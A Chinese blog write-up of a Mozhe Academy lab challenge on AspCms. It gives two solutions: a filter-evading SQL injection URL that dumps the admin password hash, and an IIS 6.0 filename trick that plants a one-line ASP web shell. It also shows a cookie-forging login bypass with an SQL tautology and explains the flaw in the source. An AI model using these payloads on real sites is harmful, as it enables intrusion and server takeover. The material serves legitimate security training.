墨者学院—CMS系统漏洞分析溯源(第4题)—两种解法

一.解题思路

登录后台利用文件解析漏洞插入一句话木马

二.操作步骤

解法一

1.利用注入漏洞,获取后台密码
构造语句

http://ip:port/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user

在这里插入图片描述

得到后台密码:121b28fa741f0976
经过MD5解密后:4rfv3edc2wsx1qaz
在这里插入图片描述

默认用户名:admin
密码:4rfv3edc2wsx1qaz

2.登录后台
默认用户名:admin
密码:4rfv3edc2wsx1qaz
在这里插入图片描述

浏览网址发现在界面风格——编辑模块/CSS文件中的文件可以任意修改和添加文件
在这里插入图片描述

3.插入木马
点击添加模板
该CMS正好存在IIS6.0解析漏洞
构造文件名为:hack.asp;.html
文件信息为:<%eval request (“pass”)%>
在这里插入图片描述

4.连接蚁剑
在这里插入图片描述
可以在文件根目录下看到密钥信息
在这里插入图片描述

解法二

1.打开cookie manger
利用 cookie manger伪造cookie,登录后台

添加下列字段
groupMenu=all
adminrand=1
adminName=admin’ or ‘1’=’1
在这里插入图片描述

2.查询http://ip:port/admin,就可以直接进入后台
在这里插入图片描述

3.获取key值
后面操作与解法一相同

漏洞解析

参考文章: https://blog.csdn.net/u014549283/article/details/81810940

在文件inc—AspCms_CommonFun.asp中的1086-1124行可以看到源码中存在相应问题
在这里插入图片描述在这里插入图片描述

在1088行alertMsgAndGo"您还没有登陆","/" ——证明adminname不能为空
在1093行alertMsgAndGo"您没有访问权限","-1" ——证明groupMenu需要等于all
在1121行alertMsgAndGo"您没有访问权限","-1" ——证明adminrand值需要为一个数字,SQL语句必须成立且返回数字为1时才具有访问权限

网络信息安全——ploto

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者学院的Windows硬盘文件分析取证是一种通过对电脑硬盘上的文件进行分析来获取相关信息的技术手段。当涉及到犯罪调查时,这项技术可以帮助警方揭示犯罪嫌疑人的行为轨迹和证据。 在对犯罪嫌疑人所使用的计算机进行分析取证时,我们首先需要新建一个用户名。新建用户名的目的是为了保护我们操作的隐私和安全,以免意外地影响现有的用户设置或对系统产生不可逆的影响。这个新建的用户名仅用于分析取证过程。 一旦新建了用户名,我们可以开始进行分析取证工作。首先,我们会使用专业的取证软件对硬盘进行扫描,以找到潜在的关键文件和目录。通过恢复已删除的文件和检测隐藏的文件,我们可以获取更全面的信息。 接着,我们会对文件进行深入的分析。通过文件的创建时间、修改时间、访问记录等元数据信息,我们可以了解文件的活动轨迹。此外,我们还会查找关键词、犯罪工具、恶意软件等可能存在的证据。 在整个过程中,需要确保对取证工作的记录和操作都能被完整地保存下来,以确保后续的法律程序和证据呈现的可靠性。 综上所述,墨者学院的Windows硬盘文件分析取证可以帮助调查人员揭示犯罪嫌疑人的行为痕迹和相关证据,而新建的用户名则是为了保护我们操作的隐私和安全。通过有效的电脑取证工作,我们能够为正义的伸张提供有力的证据支持。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值